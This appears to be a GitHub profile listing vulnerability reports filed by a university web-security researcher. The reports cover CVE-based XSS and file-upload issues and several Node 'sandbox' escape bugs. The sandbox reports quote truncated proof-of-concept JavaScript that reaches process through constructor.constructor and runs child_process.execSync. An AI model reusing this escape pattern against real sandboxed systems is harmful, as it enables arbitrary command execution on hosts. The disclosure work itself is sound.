Seongil Wi

icon indicating a website link https://seongil-wi.github.io/

icon company UNIST WebSec Lab

Results 22 issues of Seongil Wi

[Security] XSS in _contactform.inc.php

**Describe the bug** Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorized actions being performed,...

[Bug reporting] XSS vulnerabilty in wp_kses_bad_protocol in wp-includes/kses.php (CVE-2019-20041)

Hi I found a known XSS vulnerability in the recent version of wplib-box. In particular, the bug we report is a known bug by CVE-2019-20041. > wp_kses_bad_protocol in wp-includes/kses.php in...

[File upload vulnerability] CVE-2019-19576 is exist in the code!

Hi, Our research team in KAIST WSP Lab found a known file upload vulnerability in quickapps Please inspect this [spot](https://github.com/quickapps/cms/blob/077d3631fb2566ec1346200a7e5b4d6be1651f5b/plugins/Field/src/Lib/class.upload.php#L2995). The following known vulnerabilities exist in this code: CVE-2019-19576 The...

[Bug reporting] XSS vulnerabilty in wp_kses_bad_protocol in wp-includes/kses.php (CVE-2019-20041)

Hi Our research team in KAIST WSP Lab found a known XSS vulnerability in the recent version of dockerlabs. In particular, the bug we report is a known bug by...

[Bug reporting] XSS vulnerabilty in wp_kses_bad_protocol in wp-includes/kses.php (CVE-2019-20041)

1 comment

Hi I found a known XSS vulnerability in the recent version of jTypesetter. In particular, the bug we report is a known bug by CVE-2019-20041. > wp_kses_bad_protocol in wp-includes/kses.php in...

[Bug reporting] XSS vulnerabilty in wp_kses_bad_protocol in wp-includes/kses.php (CVE-2019-20041)

Hi I found a known XSS vulnerability in the recent version of docker101. In particular, the bug we report is a known bug by CVE-2019-20041. > wp_kses_bad_protocol in wp-includes/kses.php in...

Sandbox Escape Bug

- Sandbox version: 0.8.6 - Node version: 18.15.0 ```javascript var Sandbox = require("sandbox") var code = ` try{ valueOf() } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s = new Sandbox()...

Sandbox Escape Bug

- Sandbox version: 0.8.6 - Node version: 18.15.0 ```javascript var Sandbox = require("sandbox") var code = ` try{ toLocaleString() } catch(pp){ pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s = new Sandbox()...

Sandbox Escape Bug

- Sandbox version: 0.8.6 - Node version: 18.15.0 ```javascript var Sandbox = require("sandbox") var code = ` try{ __defineGetter__("x", ); } catch(ret){ ret.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s = new...

Sandbox Escape Bug

- Sandbox version: 0.8.6 - Node version: 18.15.0 ```javascript var Sandbox = require("sandbox") var code = ` try{ propertyIsEnumerable.call(undefined,); } catch (pp) { pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s =...